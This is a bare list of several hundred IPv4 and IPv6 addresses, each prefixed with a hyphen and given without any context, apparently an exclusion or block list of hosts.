-2a0a:7d80:1:7::107:38 -149.202.241.87 -107.178.162.118 -212.116.107.48 -23.224.115.38 -45.77.47.44 -159.148.20.121 -176.223.124.157 -5.178.109.173 -58.64.190.241 -5.196.246.195 -121.133.201.146 -159.148.37.111 -128.199.227.1 -45.77.160.200 -103.198.45.32 -54.211.119.236 -202.191.204.109 -103.229.192.245 -121.42.151.79 -50.22.198.211 -185.3.209.70 -137.74.154.103 -23.225.0.240 -107.164.66.159 -122.227.37.106 -103.205.3.80 -203.189.235.253 -195.248.234.36 -5.178.109.236 -104.223.34.229 -37.139.7.75 -82.193.95.8 -107.164.66.188 -164.132.107.180 -172.106.88.58 -80.93.49.42 -141.138.201.22 -37.153.111.102 -107.164.66.240 -2a0a:7d80:1:7::105:392 -79.137.45.252 -62.116.165.124 -45.35.163.162 -103.240.212.230 -133.130.107.87 -5.189.147.161 -198.24.128.6 -195.123.210.14 -173.255.237.215 -104.238.86.155 -175.41.240.43 -173.243.113.160 -103.74.121.186 -80.233.244.46 -85.254.126.59 -98.129.37.132 -66.171.236.198 -81.183.29.42 -164.70.8.79 -38.113.112.38 -191.243.239.4 -162.144.116.207 -103.250.5.70 -95.211.196.26 -119.10.50.84 -176.31.31.238 -128.199.205.167 -115.146.123.156 -103.242.2.157 -163.44.175.254 -113.62.191.61 -177.101.83.67 -123.56.90.53 -112.78.10.190 -202.171.225.104 -45.33.82.57 -212.68.50.110 -120.92.236.155 -128.199.180.111 -185.164.138.224 -151.248.116.180 -5.196.197.133 -72.1.245.42 -65.49.9.162 -202.179.64.21 -107.165.201.107 -172.97.69.164 -83.142.230.177 -185.37.227.187 -184.107.50.182 -108.61.33.76 -103.240.214.21 -123.57.228.217 -168.196.189.2 -14.18.154.27 -107.187.207.51 -23.111.148.102 -112.4.90.134 -173.193.149.116 -139.162.78.212 -13.114.194.232 -41.206.196.95 -80.233.244.42 -182.254.151.33 -45.35.163.57 -139.196.234.96 -67.227.211.67 -104.168.136.104 -47.88.4.56 -176.32.87.167 -188.68.36.204 -79.143.188.147 -117.158.34.131 -35.177.178.39 -124.243.223.29 -103.240.213.219 -172.255.173.84 -23.238.166.156 -139.196.15.43 -172.246.196.249 -178.32.117.190 -112.35.24.97 -64.6.101.135 -107.178.150.83 -103.76.85.17 -118.85.194.25 -67.225.236.152 -62.63.191.24 -46.20.5.176 -146.185.156.132 -96.43.141.244 -156.67.216.31 -213.135.71.20 -119.29.141.89 -183.148.174.216 -104.207.154.231 -121.199.61.17 -103.100.157.85 -150.95.152.214 -65.99.225.136 -172.106.184.30 -172.255.173.106 -115.133.177.149 -87.237.205.92 -34.203.77.25 -94.102.56.148 -62.63.190.17 -117.48.209.70 -104.232.75.178 -115.29.47.167 -79.137.71.69 -173.252.197.125 -139.196.198.58 -198.24.128.5 -107.164.66.83 -149.210.190.87 -159.255.168.99 -2a01:488:67:1000:523:f87a:0:1 -118.190.116.173 -37.187.201.15 -23.110.56.115 -156.237.178.139 -103.100.157.21 -122.9.29.215 -5.178.109.98 -112.80.41.235 -85.25.37.192 -112.74.114.9 -117.27.139.26 -80.233.244.41 -109.163.208.131 -2a0a:7d80:1:9::99:42 -216.17.105.103 -123.108.108.177 -178.32.189.182 -103.240.213.56 -172.107.73.197 -107.187.204.47 -23.239.2.53 -62.112.162.201 -77.77.150.145 -117.27.143.242 -139.199.6.197 -23.88.82.97 -192.33.132.183 -120.26.56.177 -221.215.64.188 -173.0.63.176 -191.96.51.24 -82.135.151.67 -107.187.41.67 -95.213.224.46 -2a0a:7d80:1:9::99:18e -159.148.20.109 -172.255.173.75 -104.224.203.154 -120.76.245.30 -120.24.65.124 -169.239.72.150 -109.237.25.43 -120.76.158.235 -123.207.34.20 -103.240.213.107 -178.32.92.70 -121.40.141.202 -144.48.125.132 -72.1.245.95 -14.223.94.167 -82.196.13.201 -91.239.232.162 -142.91.95.154 -137.74.59.180 -123.207.249.120 -2a0a:7d80:1:7::93:254 -119.2.54.69 -138.201.200.184 -134.119.168.229 -103.240.213.74 -96.44.179.246 -103.205.0.71 -104.200.20.142 -117.187.15.210 -2a0a:7d80:1:9::98:77 -89.107.129.121 -106.2.1.166 -183.232.54.218 -2a02:418:605b::40 -101.0.69.12 -79.124.6.172 -103.242.106.117 -89.108.116.127 -103.240.213.27 -174.37.242.47 -123.57.59.45 -167.114.22.67 -45.63.4.240 -139.59.59.6 -139.162.41.62 -106.14.245.68 -101.200.166.239 -46.38.62.182 -119.29.72.109 -120.92.237.116 -123.122.64.149 -112.175.106.20 -151.80.7.41 -180.250.246.235 -2a0a:7d80:1:7::91:260 -123.57.156.50 -64.237.48.180 -23.225.0.57 -47.94.109.61 -192.99.230.46 -110.4.42.44 -172.106.184.15 -92.51.181.30 -107.164.66.9 -103.242.106.119 -101.37.254.148 -37.106.200.170 -185.38.45.103 -103.198.45.46 -180.175.215.188 -120.76.72.114 -216.17.107.160 -80.233.244.49 -119.136.25.166 -47.93.184.184 -107.187.192.151 -103.240.212.224 -123.56.181.82 -64.6.97.232 -172.252.10.195 -176.31.210.46 -216.17.111.223 -62.138.14.148 -101.37.174.124 -134.119.171.38 -133.130.96.123 -210.211.125.56 -120.78.217.176 -23.230.19.59 -180.169.3.99 -106.75.108.83 -211.149.195.80 -60.191.221.164 -163.172.20.85 -181.111.252.210 -185.13.59.20 -120.55.71.125 -47.88.213.102 -67.225.249.250 -200.178.179.38 -23.19.238.14 -149.12.208.144 -162.254.149.162 -200.60.41.109 -103.253.115.180 -188.166.243.211 -66.228.53.180 -149.56.78.109 -211.233.18.199 -168.235.68.231 -101.132.124.223 -172.252.10.154 -91.134.185.233 -61.91.5.190 -34.201.227.157 -69.65.50.71 -23.225.89.211 -210.105.192.118 -195.178.5.165 -62.75.137.127 -51.255.120.237 -45.55.215.107 -86.104.177.113 -116.206.179.12 -77.78.97.27 -210.118.193.165 -185.164.138.220 -144.217.7.76 -107.164.66.17 -136.0.69.42 -163.172.67.216 -47.97.44.205 -118.193.204.151 -185.50.178.135 -121.41.110.166 -199.30.246.153 -54.169.80.157 -149.71.102.240 -142.91.95.125 -213.135.42.102 -23.230.19.182 -107.178.150.124 -122.9.29.211 -136.0.69.36 -104.168.144.190 -120.25.161.10 -137.74.154.75 -167.88.124.9 -115.29.220.56 -87.118.68.197 -151.253.68.70 -108.161.151.158 -210.149.30.109 -125.6.163.7 -23.19.238.39 -5.178.109.139 -139.196.217.212 -23.19.202.56 -124.248.207.254 -192.81.128.201 -103.235.234.214 -192.155.85.189 -133.130.99.250 -81.2.234.228 -192.52.166.106 -107.165.201.43 -162.144.71.26 -31.28.27.18 -158.69.186.132 -185.163.100.36 -142.91.241.121 -125.99.68.225 -149.202.243.181 -188.132.180.101 -172.246.196.178 -202.51.187.238 -165.84.167.160 -45.35.163.163 -107.165.201.27 -5.135.118.250 -213.138.119.43 -86.104.177.87 -107.170.63.87 -120.25.62.204 -166.63.21.51 -83.212.171.104 -37.58.95.203 -212.170.98.119 -23.230.19.218 -37.187.57.225 -213.186.121.80 -23.238.166.183 -61.131.37.240 -151.80.172.46 -153.36.242.34 -45.32.213.245 -194.110.165.222 -46.105.123.130 -103.240.212.77 -137.74.35.45 -122.9.163.224 -103.240.212.25 -45.32.76.63 -182.61.17.173 -47.92.107.62 -2a0a:7d80:1:9::98:fe -106.187.92.14 -43.254.145.66 -107.164.66.42 -107.181.251.139 -23.238.129.98 -192.3.217.125 -203.84.136.24 -139.162.63.105 -123.56.192.158 -45.35.163.142 -184.173.49.232 -107.155.114.233 -217.30.184.114 -198.61.210.138 -114.55.7.212 -120.25.250.67 -94.72.41.85 -218.245.4.85 -139.162.106.155 -121.41.92.59 -134.119.122.233 -111.231.16.148 -72.20.124.24 -93.104.214.7 -13.230.225.218 -167.88.115.245 -98.124.176.205 -194.19.246.7 -23.230.19.20 -89.252.188.172 -120.77.251.75 -173.0.63.153 -103.48.80.119 -114.215.177.103 -218.244.140.190 -178.79.148.218 -112.25.69.40 -122.114.39.121 -162.13.95.192 -122.114.94.39 -173.212.199.69 -93.180.159.59 -123.59.81.232 -184.73.143.224 -5.178.109.224 -114.255.138.169 -103.29.215.110 -104.149.66.183 -107.164.66.74 -104.148.100.109 -101.200.48.140 -216.104.47.230 -120.79.106.143 -31.210.52.203 -106.14.39.162 -45.35.163.159 -151.80.255.21 -188.213.232.16 -58.244.255.179 -173.252.197.113 -118.193.223.170 -43.241.238.65 -202.106.33.215 -158.69.36.28 -119.29.171.224 -178.32.60.212 -181.191.8.75 -49.212.174.63 -2a0a:7d80:1:7::92:11c -123.249.0.170 -92.222.78.176 -172.252.10.45 -103.90.226.70 -104.202.185.115 -23.110.61.108 -213.227.137.32 -173.0.63.195 -212.83.177.33 -110.232.142.214 -103.12.49.62 -142.91.95.46 -91.134.151.84 -88.150.157.165 -188.165.230.82 -115.126.51.37 -45.61.115.49 -156.235.168.50 -5.39.16.26 -120.76.128.89 -54.229.231.233 -173.193.149.118 -145.239.102.115 -198.24.161.130 -107.167.186.0 -23.250.28.23 -23.225.113.141 -217.199.169.74 -58.62.237.147 -149.56.151.150 -103.100.157.169 -120.55.186.205 -218.78.208.247 -50.62.45.240 -185.163.100.209 -34.241.143.74 -61.56.212.102 -185.163.100.186 -13.229.131.239 -172.246.196.242 -54.193.152.89 -107.165.201.157 -136.0.69.97 -121.40.36.246 -203.138.223.114 -188.165.250.221 -138.197.225.195 -198.8.88.205 -188.165.187.51 -78.128.216.78 -124.42.240.5 -23.110.47.203 -213.168.36.42 -106.14.80.91 -107.165.201.243 -188.116.35.119 -38.96.185.24 -2a0a:7d80:1:7::104:22 -112.124.118.135 -45.41.92.134 -221.130.137.240 -119.29.190.50 -219.148.37.166 -62.210.107.65 -121.40.105.240 -2a0a:7d80:1:9::99:29f -201.116.146.185 -112.85.214.125 -138.201.57.81 -220.181.86.48 -67.225.236.47 -62.63.190.44 -163.172.29.248 -142.4.28.92 -82.135.151.173 -114.215.47.135 -122.9.229.153 -137.74.232.112 -185.122.140.109 -120.24.88.184 -107.187.41.77 -213.208.162.78 -91.230.194.82 -218.106.99.52 -103.195.240.4 -54.36.87.209 -198.24.163.226 -120.26.119.149 -111.193.55.233 -35.176.218.199 -142.91.95.72 -192.241.222.33 -37.221.161.47 -47.91.206.60 -104.202.185.12 -208.100.13.32 -118.218.136.55 -37.140.195.201 -69.61.64.189 -213.159.7.203 -113.196.233.197 -218.145.71.214 -89.35.7.108 -112.243.89.26 -142.91.243.79 -114.55.112.87 -156.235.170.124 -38.89.161.13 -31.24.230.24 -89.19.22.219 -60.211.250.17 -185.25.48.138 -192.117.146.160 -117.103.204.41 -103.240.183.78 -66.55.156.140 -153.122.85.227 -203.153.124.90 -103.74.118.79 -119.23.15.246 -23.225.0.101 -119.29.238.42 -192.169.152.250 -94.23.169.176 -104.202.185.161 -188.226.136.248 -23.227.133.34 -139.99.101.108 -123.207.141.107 -23.225.0.2 -45.77.180.108 -180.76.148.122 -107.170.233.171 -194.135.80.187 -45.32.76.176 -45.41.92.179 -176.126.165.31 -142.91.243.118 -114.55.151.115 -114.242.195.196 -139.59.13.203 -39.108.58.16 -180.168.28.57 -103.100.157.170 -208.167.237.229 -139.199.23.35 -66.23.235.237 -178.62.190.250 -59.110.48.112 -91.199.255.37 -207.38.84.238 -23.238.129.106 -188.116.55.238 -101.227.249.84 -103.240.215.55 -161.202.28.138 -83.239.117.150 -91.134.228.236 -123.60.202.245 -77.235.50.99 -64.120.123.246 -185.122.140.97 -121.196.192.154 -172.106.187.198 -128.199.165.160 -64.210.128.86 -77.223.134.221 -139.162.36.115 -185.12.111.67 -96.30.1.118 -27.50.17.154 -178.32.54.81 -103.240.214.238 -37.128.132.6 -103.240.215.151 -213.252.244.234 -54.222.245.197 -104.225.223.56 -23.230.19.196 -69.42.50.178 -172.255.159.218 -174.37.231.147 -210.245.17.35 -37.187.53.244 -45.77.15.135 -45.114.117.104 -123.81.222.136 -139.196.12.169 -76.72.164.235 -103.100.157.20 -195.244.57.164 -47.91.151.24 -178.32.190.44 -139.224.42.187 -178.62.139.215 -5.175.0.174 -46.101.39.227 -216.17.108.112 -52.43.90.113 -199.241.188.166 -192.40.58.33 -123.207.108.174 -213.79.2.13 -122.9.15.25 -51.255.88.40 -211.75.132.66 -150.95.155.193 -103.240.213.221 -95.85.40.187 -163.44.192.235 -153.122.49.30 -45.56.93.42 -202.168.148.212 -210.245.83.245 -172.246.196.175 -124.160.118.80 -77.81.120.185 -46.51.177.56 -198.200.41.120 -220.178.249.26 -37.34.55.100 -117.18.12.34 -103.240.215.88 -23.244.241.7 -114.55.142.13 -119.38.132.206 -93.115.31.41 -188.165.10.139 -166.63.21.16 -59.110.138.120 -119.81.78.66 -162.247.232.89 -153.36.240.114 -139.224.187.11 -59.188.232.80 -156.235.171.143 -218.205.207.243 -119.28.68.95 -139.196.229.202 -62.63.191.42 -103.74.118.82 -91.194.60.230 -177.72.66.164 -132.248.31.15 -77.246.187.119 -158.69.160.115 -103.240.213.51 -103.74.120.183 -103.205.0.87 -131.255.5.54 -64.46.156.55 -164.70.8.188 -114.55.146.236 -78.128.211.78 -184.173.240.118 -185.86.134.14 -107.165.201.209 -54.193.183.70 -188.93.94.117 -211.149.202.236 -23.110.47.201 -60.166.56.89 -178.32.189.168 -78.40.225.122 -185.82.222.9 -94.48.81.184 -120.76.74.166 -23.19.237.27 -34.212.15.95 -163.44.167.0 -67.231.248.34 -118.190.15.85 -13.112.206.198 -157.7.200.23 -122.9.229.133 -195.123.237.154 -119.23.224.166 -104.250.143.194 -120.92.236.15 -111.90.147.59 -122.13.79.140 -47.100.186.250 -104.131.78.246 -107.164.66.36 -89.218.2.212 -123.57.226.54 -119.38.132.216 -96.30.1.116 -172.107.75.254 -67.196.126.235 -23.228.73.233 -104.149.66.162 -212.59.77.206 -2a04:ac00:4:2b7a:5054:ff:fe01:28ab -198.12.148.235 -95.85.31.6 -173.214.110.232 -185.114.192.41 -198.52.100.10 -85.206.175.195 -151.80.255.14 -201.116.121.243 -36.37.104.100 -104.238.77.225 -91.121.254.196 -118.122.119.220 -144.217.240.135 -23.230.19.95 -67.205.169.101 -62.138.14.4 -114.55.30.233 -78.111.82.96 -172.104.17.233 -47.89.27.107 -192.254.131.16 -113.161.106.190 -47.91.146.198 -23.225.89.183 -156.235.169.179 -68.232.185.89 -64.251.26.146 -154.16.118.16 -39.106.167.120 -174.139.188.98 -120.92.226.139 -109.73.168.239 -79.98.30.39 -31.41.219.180 -172.107.146.177 -104.243.46.211 -130.193.12.193 -45.56.127.86 -91.224.194.53 -208.103.154.99 -51.255.151.128 -58.53.94.68 -103.42.58.4 -211.149.244.208 -166.63.21.2 -172.106.184.45 -149.56.143.32 -123.58.5.91 -2a0a:7d80:1:7::105:120 -185.163.100.5 -185.87.187.158 -23.224.115.189 -183.63.30.74 -122.193.91.180 -82.135.151.252 -178.32.58.7 -133.130.122.108 -61.160.245.70 -94.176.233.241 -185.163.100.127 -188.165.208.47 -159.148.37.116 -120.76.41.142 -115.159.62.253 -119.131.218.58 -107.165.201.137 -45.64.169.25 -94.23.116.127 -37.139.17.32 -58.120.227.52 -85.204.22.43 -178.33.15.105 -62.63.190.12 -54.228.247.19 -31.130.202.137 -109.104.104.114 -120.24.235.108 -139.59.123.11 -74.127.45.165 -120.89.88.86 -122.224.6.77 -162.216.17.131 -181.215.53.101 -178.32.51.221 -23.225.113.20 -159.148.20.125 -192.152.0.10 -107.6.140.216 -181.174.184.101 -95.85.21.219 -60.12.147.59 -156.235.169.169 -178.172.235.216 -119.42.150.212 -178.33.106.89 -192.95.18.129 -218.246.127.105 -192.81.133.115 -67.205.142.221 -123.207.15.41 -178.33.139.251 -64.120.123.220 -78.39.157.130 -103.240.215.74 -198.199.86.67 -104.202.185.159 -199.33.122.215 -122.9.235.195 -27.118.26.9 -91.134.134.224 -45.114.94.94 -120.24.156.161 -23.238.129.107 -37.220.42.132 -120.25.101.229 -5.135.58.104 -5.63.155.244 -103.42.178.125 -122.155.187.25 -103.12.50.6 -192.186.175.89 -103.22.181.201 -156.237.176.219 -122.9.31.6 -2a0a:7d80:1:7::92:177 -66.199.234.245 -220.86.69.54 -217.182.171.156 -94.142.142.149 -212.129.3.73 -167.114.241.44 -222.189.187.28 -209.126.103.110 -74.82.169.14 -93.188.167.115 -185.91.108.187 -164.132.58.132 -185.155.99.108 -172.107.64.62 -14.17.88.47 -5.178.109.229 -14.140.46.237 -94.130.237.220 -45.120.30.212 -188.132.135.38 -104.236.176.103 -23.239.7.163 -195.154.150.139 -149.202.120.225 -185.29.122.108 -103.35.123.60 -116.255.197.89 -172.247.51.67 -178.18.196.147 -82.146.48.13 -221.204.187.207 -204.93.61.174 -23.230.19.86 -195.154.32.81 -107.187.214.18 -121.40.60.146 -65.60.5.103 -110.232.255.51 -162.210.193.72 -89.33.247.11 -120.77.240.22 -54.36.190.136 -196.30.251.190 -5.135.229.80 -210.5.42.48 -122.9.229.147 -45.56.107.97 -120.92.227.49 -139.196.144.62 -40.79.78.24 -103.49.10.157 -81.28.98.88 -104.202.185.84 -131.161.46.3 -185.13.59.148 -122.9.15.40 -5.178.109.136 -119.36.178.66 -217.182.103.235 -115.28.240.160 -178.33.171.88 -54.89.173.241 -103.236.188.39 -120.27.198.172 -45.61.114.20 -37.139.7.215 -23.111.68.131 -107.187.41.175 -116.62.200.148 -103.205.2.68 -45.79.5.165 -5.178.109.221 -66.37.25.186 -180.235.137.33 -69.30.233.106 -52.3.223.51 -107.164.66.135 -104.232.75.161 -52.128.246.198 -204.93.61.60 -123.207.96.32 -31.14.22.174 -51.254.238.250 -222.222.216.184 -35.229.124.225 -198.200.41.107 -107.181.251.153 -104.131.184.220 -27.203.88.119 -104.198.49.114 -23.19.237.44 -172.252.10.41 -221.232.149.168 -192.241.137.21 -193.238.136.162 -114.215.237.141 -103.231.70.232 -14.128.20.195 -103.100.157.66 -94.103.43.206 -176.123.8.194 -189.76.176.15 -212.68.57.84 -119.23.75.98 -2a0a:7d80:1:7::103:21f -101.64.233.130 -37.1.204.126 -217.23.144.37 -112.74.100.130 -107.21.181.244 -5.45.75.68 -171.244.4.173 -5.178.109.137 -173.236.78.74 -54.217.238.80 -119.38.160.26 -119.29.106.231 -122.49.35.58 -119.29.221.155 -103.44.160.228 -202.73.24.170 -148.251.31.100 -107.164.66.216 -77.246.182.204 -91.205.127.216 -182.92.203.167 -162.252.82.37 -142.4.113.208 -138.197.141.64 -192.186.175.90 -201.226.237.75 -54.171.114.175 -111.231.56.82 -123.56.171.28 -125.212.207.92 -163.172.85.3 -98.124.177.144 -113.226.146.104 -82.79.17.180 -118.184.38.241 -92.63.111.12 -95.140.34.132 -188.42.240.252 -183.134.78.83 -157.7.201.98 -218.244.129.114 -128.199.226.110 -72.14.187.200 -86.104.177.58 -85.254.126.99 -123.56.237.234 -52.199.222.108 -2a0a:7d80:1:7::107:10c -210.51.163.198 -124.243.240.89 -106.14.67.208 -27.192.112.233 -31.3.153.42 -62.210.250.192 -161.202.63.222 -103.200.16.142 -159.203.152.217 -115.28.105.201 -173.249.158.46 -101.200.208.234 -119.81.73.98 -91.212.250.12 -34.242.168.175 -113.229.81.91 -173.82.245.76 -107.164.66.168 -134.119.5.204 -5.178.109.116 -172.85.98.254 -74.118.10.101 -220.181.86.38 -49.212.173.178 -195.154.53.161 -178.33.15.95 -114.215.46.32 -72.14.182.186 -178.32.47.93 -123.207.124.205 -178.132.2.52 -185.66.141.220 -188.226.181.18 -161.47.83.243 -77.92.144.7 -52.67.14.243 -77.235.50.98 -175.122.253.11 -185.154.12.55 -116.213.171.35 -198.44.190.176 -95.38.224.166 -139.162.10.243 -128.1.182.142 -107.6.171.106 -45.35.163.198 -54.234.224.195 -176.31.152.27 -23.224.115.68 -5.178.109.193 -103.240.212.203 -172.252.10.243 -122.9.15.60 -93.188.167.139 -51.255.127.214 -91.224.140.22 -95.154.242.94 -47.89.18.100 -54.183.150.162 -91.149.141.78 -133.242.232.145 -142.91.239.105 -134.119.172.55 -103.74.121.175 -218.60.28.154 -133.242.230.27 -142.91.95.221 -217.160.91.159 -103.240.213.214 -211.149.178.58 -107.164.66.61 -213.14.137.15 -123.207.118.109 -101.200.192.225 -136.0.69.115 -2a0a:7d80:1:7::101:d -122.9.18.133 -59.153.61.176 -120.77.202.235 -115.28.149.4 -120.25.225.168 -172.104.137.26 -118.69.168.113 -198.8.61.11 -31.28.169.53 -138.197.45.33 -121.40.54.198 -70.36.125.40 -86.104.177.74 -149.12.209.23 -121.196.233.44 -5.45.74.160 -211.149.144.63 -124.207.4.82 -212.83.185.3 -158.69.142.149 -119.92.170.36 -5.101.164.200 -104.239.240.99 -91.235.129.219 -189.89.157.194 -77.235.50.110 -104.232.102.186 -139.209.34.189 -194.145.209.196 -115.28.178.106 -139.59.1.206 -54.153.66.186 -23.244.241.236 -172.246.196.31 -120.76.202.101 -188.165.243.202 -185.22.92.73 -211.149.186.142 -101.200.231.187 -176.31.127.144 -31.187.70.95 -188.226.156.77 -1.226.200.189 -218.32.216.249 -91.227.16.32 -198.38.84.14 -120.77.219.99 -23.19.238.45 -186.226.184.4 -192.99.230.51 -188.116.7.224 -61.139.77.181 -185.163.100.33 -54.160.163.154 -115.29.4.187 -91.216.9.102 -37.247.104.26 -103.249.106.191 -134.119.10.167 -182.92.131.94 -61.153.54.35 -158.69.132.63 -178.32.215.197 -142.91.241.100 -120.26.96.133 -64.207.177.151 -142.44.144.77 -172.252.10.231 -66.55.156.158 -62.63.157.140 -91.102.160.205 -106.187.101.138 -54.249.36.116 -103.100.157.152 -172.104.60.128 -183.245.199.159 -114.80.85.178 -103.250.94.229 -185.182.99.26 -120.55.180.15 -172.252.10.75 -123.57.70.17 -120.24.179.55 -112.74.130.182 -47.93.25.61 -110.93.216.174 -220.191.168.166 -192.122.200.66 -92.222.202.44 -60.190.145.172 -185.67.207.59 -23.225.113.124 -149.56.41.122 -103.48.80.137 -136.0.69.80 -107.165.201.78 -156.235.172.66 -212.224.127.72 -122.9.29.245 -103.74.121.203 -128.199.138.198 -45.63.27.227 -133.130.112.94 -138.99.23.236 -116.255.183.212 -103.240.212.222 -103.12.49.49 -188.226.182.117 -195.154.241.199 -103.8.124.40 -198.89.228.28 -172.247.51.231 -184.173.221.176 -69.162.115.56 -23.110.61.89 -195.154.49.56 -133.242.121.219 -62.12.114.11 -220.163.104.27 -189.84.14.131 -112.65.147.122 -119.23.225.221 -208.167.252.4 -107.187.41.230 -99.198.111.117 -108.61.149.30 -50.22.159.132 -67.205.147.82 -151.236.54.202 -103.227.62.133 -152.66.71.170 -50.57.77.236 -189.22.219.199 -222.211.65.8 -185.86.77.5 -45.41.92.182 -183.36.124.143 -46.101.235.29 -111.202.15.19 -107.187.41.253 -47.93.17.19 -23.230.19.226 -171.212.121.61 -50.56.111.101 -103.40.162.82 -91.230.193.226 -13.114.80.231 -23.88.82.154 -185.163.100.40 -112.74.79.26 -103.205.3.95 -178.33.110.160 -146.185.144.13 -86.104.177.123 -178.62.239.140 -172.104.105.133 -54.89.120.149 -122.200.121.243 -142.91.95.160 -45.228.64.112 -43.241.216.88 -172.245.126.238 -23.247.10.173 -209.205.221.50 -40.114.50.102 -82.135.151.146 -23.230.19.81 -172.252.10.110 -169.50.156.174 -121.42.164.146 -177.93.110.3 -104.168.147.213 -45.64.98.14 -142.44.201.209 -222.186.31.105 -23.88.82.25 -185.13.59.114 -107.178.147.97 -23.244.241.56 -92.50.113.155 -108.170.59.222 -172.255.173.7 -209.236.96.30 -115.159.75.212 -45.35.163.86 -156.67.216.144 -91.142.210.173 -118.69.171.186 -173.214.250.9 -169.50.224.167 -51.254.164.58 -103.215.8.36 -64.60.165.203 -103.250.94.235 -218.244.146.68 -162.212.252.45 -114.246.74.204 -106.14.244.136 -176.31.233.201 -107.151.113.212 -209.222.235.108 -120.92.227.125 -50.116.105.168 -31.130.202.152 -178.62.202.123 -185.86.79.72 -185.13.58.167 -34.248.161.75 -23.104.135.191 -52.87.102.15 -192.71.5.225 -69.175.69.21 -5.152.201.117 -23.244.241.144 -103.240.215.124 -66.193.212.242 -120.55.60.219 -112.126.73.94 -185.163.100.161 -46.166.142.177 -81.95.148.130 -159.65.233.8 -184.95.36.85 -95.85.57.180 -106.3.44.37 -185.191.228.170 -143.107.201.28 -121.41.176.81 -209.188.8.179 -114.215.171.41 -80.237.242.196 -172.102.197.167 -119.29.135.119 -62.100.206.101 -45.42.94.142 -182.48.84.99 -34.206.54.114 -45.32.114.125 -45.33.13.188 -23.229.4.34 -23.19.22.3 -199.59.88.33 -31.169.73.3 -198.235.132.72 -156.237.176.201 -188.116.12.181 -47.206.104.137 -54.169.26.228 -67.229.63.109 -195.8.206.138 -45.121.65.7 -54.202.66.143 -104.168.170.113 -41.208.71.86 -42.62.11.250 -66.70.214.247 -156.235.171.157 -64.6.108.99 -37.120.166.229 -61.155.214.21 -184.154.69.93 -172.110.18.126 -23.244.241.153 -65.60.5.111 -120.25.123.103 -91.210.44.130 -103.240.213.223 -103.74.121.174 -70.32.76.120 -118.89.157.184 -47.104.30.221 -198.100.153.73 -62.138.137.104 -183.181.0.70 -36.55.234.227 -1.189.191.226 -221.228.209.231 -67.215.234.114 -172.246.196.17 -121.196.197.45 -104.197.52.178 -209.126.76.140 -120.76.246.30 -172.252.10.232 -162.243.18.244 -52.6.250.218 -47.94.247.60 -120.24.65.156 -54.217.237.59 -138.197.12.124 -172.255.159.234 -159.253.44.214 -172.255.159.251 -121.41.88.3 -158.69.208.214 -198.24.160.93 -66.171.239.47 -59.153.61.173 -122.9.15.34 -193.200.158.77 -41.185.30.150 -204.11.236.213 -115.29.29.29 -104.149.66.153 -13.127.84.14 -208.122.215.251 -65.60.43.178 -199.188.111.129 -104.224.201.252 -116.228.70.122 -173.192.217.217 -107.165.201.154 -195.242.161.236 -2a0a:7d80:1:7::106:297 -51.15.190.204 -156.235.170.107 -163.172.212.54 -107.187.204.51 -80.84.230.22 -67.229.58.221 -186.4.191.214 -134.119.117.3 -91.121.173.58 -62.210.202.234 -62.76.189.186 -107.178.147.112 -103.100.157.254 -104.148.100.106 -67.222.143.101 -101.0.69.13 -198.178.120.146 -119.29.24.62 -171.217.167.121 -193.203.226.70 -103.66.104.13 -132.148.144.133 -128.199.230.174 -149.202.71.233 -109.169.76.66 -223.214.245.243 -196.11.82.14 -52.35.61.36 -122.9.29.195 -64.237.35.212 -103.230.111.66 -107.179.102.194 -54.38.33.4 -211.149.198.114 -62.63.190.42 -107.164.66.76 -101.69.110.83 -66.55.143.44 -177.75.72.15 -104.202.185.24 -178.250.169.5 -103.53.197.98 -172.255.173.23 -120.27.9.36 -45.76.146.39 -62.12.117.108 -156.237.177.186 -131.161.75.33 -104.203.82.50 -5.178.109.120 -207.178.46.26 -123.57.46.187 -23.225.113.147 -107.187.41.148 -188.165.187.60 -184.164.139.22 -23.19.202.2 -64.120.123.199 -23.225.0.221 -124.238.253.5 -189.8.9.187 -112.78.10.80 -188.132.147.79 -183.146.211.235 -23.19.237.22 -101.200.38.66 -81.177.165.34 -164.132.4.132 -142.91.241.108 -124.243.223.28 -103.240.215.66 -23.225.113.44 -208.110.69.242 -118.244.226.5 -37.75.12.220 -87.118.80.178 -66.171.239.181 -46.105.88.213 -79.174.66.8 -85.204.96.180 -195.216.166.20 -103.233.8.26 -125.65.108.143 -183.239.172.190 -103.240.212.189 -216.17.108.196 -172.255.173.244 -23.253.73.185 -182.160.158.65 -87.237.205.77 -5.63.155.98 -124.193.144.67 -162.255.163.142 -139.255.50.27 -139.255.50.27 -205.186.129.121 -103.37.85.5 -198.200.41.88 -103.77.205.124 -120.26.66.152 -164.132.109.170 -69.197.182.196 -121.201.38.197 -142.91.243.101 -200.98.20.16 -188.225.33.191 -103.240.215.47 -103.240.214.182 -82.77.27.65 -216.158.235.5 -119.38.131.31 -23.225.145.171 -134.119.173.131 -103.240.213.210 -178.33.179.121 -103.39.78.43 -68.232.185.91 -119.235.252.238 -46.101.251.30 -203.195.235.154 -120.26.101.102 -52.87.234.2 -172.246.220.29 -217.149.244.13 -69.164.218.116 -120.55.189.185 -171.14.211.159 -195.88.209.188 -122.9.18.189 -212.47.236.42 -223.223.178.4 -185.195.76.202 -46.105.180.208 -185.191.229.3 -67.196.126.238 -118.89.198.118 -69.175.18.44 -103.216.114.98 -172.107.71.27 -118.26.72.166 -91.109.0.206 -139.129.95.103 -103.12.50.28 -192.99.78.5 -178.249.187.241 -194.19.246.27 -106.75.17.252 -119.23.236.127 -5.178.109.78 -103.12.49.43 -123.56.110.209 -103.240.215.16 -122.9.15.29 -62.63.157.142 -59.86.162.184 -209.126.120.190 -185.43.221.216 -62.149.25.92 -211.162.69.174 -172.255.159.253 -220.181.86.42 -120.92.234.10 -54.36.88.139 -107.186.35.205 -103.250.94.239 -112.74.45.62 -109.194.195.244 -13.231.47.29 -149.56.15.159 -119.81.11.39 -156.237.179.98 -1.196.143.203 -50.116.1.12 -121.197.1.168 -119.23.135.47 -200.90.157.149 -177.39.17.172 -123.55.91.189 -103.85.21.72 -122.10.119.35 -139.162.113.21 -31.14.18.141 -183.232.28.202 -95.213.224.57 -159.203.119.9 -185.57.104.67 -45.79.136.9 -62.210.138.23 -103.240.213.216 -195.244.58.98 -212.224.99.240 -23.104.135.70 -222.249.141.42 -112.74.163.253 -45.35.163.194 -79.137.53.42 -162.222.139.228 -104.194.233.34 -123.207.127.150 -204.93.61.65 -92.222.7.43 -47.97.215.4 -142.91.243.70 -172.107.146.163 -64.34.175.41 -192.3.23.202 -211.157.0.144 -76.164.210.144 -195.12.154.156 -188.226.190.52 -133.130.117.52 -108.168.147.218 -188.165.20.253 -223.96.90.253 